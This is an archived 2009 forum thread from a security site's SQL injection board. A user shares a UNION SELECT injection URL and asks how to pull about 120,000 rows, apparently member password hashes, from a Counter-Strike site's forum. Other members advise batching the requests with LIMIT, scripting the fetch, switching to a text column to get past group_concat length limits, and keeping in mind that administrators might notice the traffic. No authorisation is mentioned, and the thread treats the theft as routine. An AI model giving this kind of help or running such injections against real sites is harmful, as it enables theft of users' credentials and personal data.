Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
April 30, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 534
Members: 0
Total: 534
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> SQLi dump problem
Post new topic  Reply to topic View previous topic :: View next topic 
SQLi dump problem
PostPosted: Mon Jan 12, 2009 3:13 pm Reply with quote
10_Sec_Hero
Advanced user
Advanced user
 
Joined: Oct 22, 2008
Posts: 52




Ok so here is an url example:
Code:
http://www.host.com/scipt.php?id=2572 AND 1=0 UNION SELECT ALL 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from table_name--

version: 5.0.51a-community

let's say column 2 is vulnerable and I want to dump all data in it (about 120,000) rows and I want it all at once. What function should I use? I tried group_concat(), that dumps like 15 rows and concat() which only dumps 1 row. Usually the concat() function works fine in dumping all the data.

Thanks Smile

_________________
Sky Is The Limit !!
View user's profile Send private message
PostPosted: Mon Jan 12, 2009 3:28 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You can issue multiple request with LIMIT x,y.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Jan 12, 2009 3:43 pm Reply with quote
10_Sec_Hero
Advanced user
Advanced user
 
Joined: Oct 22, 2008
Posts: 52




By doing the limit function I only get 1 row each time and I want all 120,000 rows in one go or a couple of goes, certanly not 120,000 Laughing

_________________
Sky Is The Limit !!
View user's profile Send private message
PostPosted: Mon Jan 12, 2009 4:25 pm Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




What about a little script fetching and saving 120.000 rows? Smile

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Mon Jan 12, 2009 4:39 pm Reply with quote
10_Sec_Hero
Advanced user
Advanced user
 
Joined: Oct 22, 2008
Posts: 52




I have no experience with scripts, no idea how to create them or execute them, only URL based injection Rolling Eyes

_________________
Sky Is The Limit !!
View user's profile Send private message
PostPosted: Mon Jan 12, 2009 9:31 pm Reply with quote
tehhunter
Valuable expert
Valuable expert
 
Joined: Nov 19, 2008
Posts: 261




Chb wrote:
What about a little script fetching and saving 120.000 rows? Smile
That's what he might have to do but its not necessarily the best idea. Administrators might notice that there were 120,000 page views of a slightly modified injection url. Is this a big site? Seeing as you are trying to extract 120,000 hashes (I guess?) it probably is.

Before that solution though, try to use what waraxe said use group_concat() along with LIMIT 0,120000 and see if that helps. Perhaps the problem is that the max default size of dumped hashes for group_concat() is 15?
View user's profile Send private message
PostPosted: Tue Jan 13, 2009 5:26 am Reply with quote
10_Sec_Hero
Advanced user
Advanced user
 
Joined: Oct 22, 2008
Posts: 52




tehhunter wrote:
Chb wrote:
What about a little script fetching and saving 120.000 rows? Smile
That's what he might have to do but its not necessarily the best idea. Administrators might notice that there were 120,000 page views of a slightly modified injection url. Is this a big site? Seeing as you are trying to extract 120,000 hashes (I guess?) it probably is.

Before that solution though, try to use what waraxe said use group_concat() along with LIMIT 0,120000 and see if that helps. Perhaps the problem is that the max default size of dumped hashes for group_concat() is 15?


Its a Counter-Strike site with a forum with 120,000 members. group_concat along with LIMIT 0,120000 doesn't work I tried it before making this topic, and group_concat() always has a max value roughly about 1000 chars, in this case 46 rows.

_________________
Sky Is The Limit !!
View user's profile Send private message
PostPosted: Tue Jan 13, 2009 8:57 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




So it appears that you can use group_concat(), but problem is elsewhere - column, you are using for data fetch, is probably declared as varchar(1024), or varchar(1000). If you can use other column with text data type, then limits are gone. Otherwise your only choice is to write script and fetch data via multiple requests with help of LIMIT.
View user's profile Send private message Send e-mail Visit poster's website
SQLi dump problem
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.128 Seconds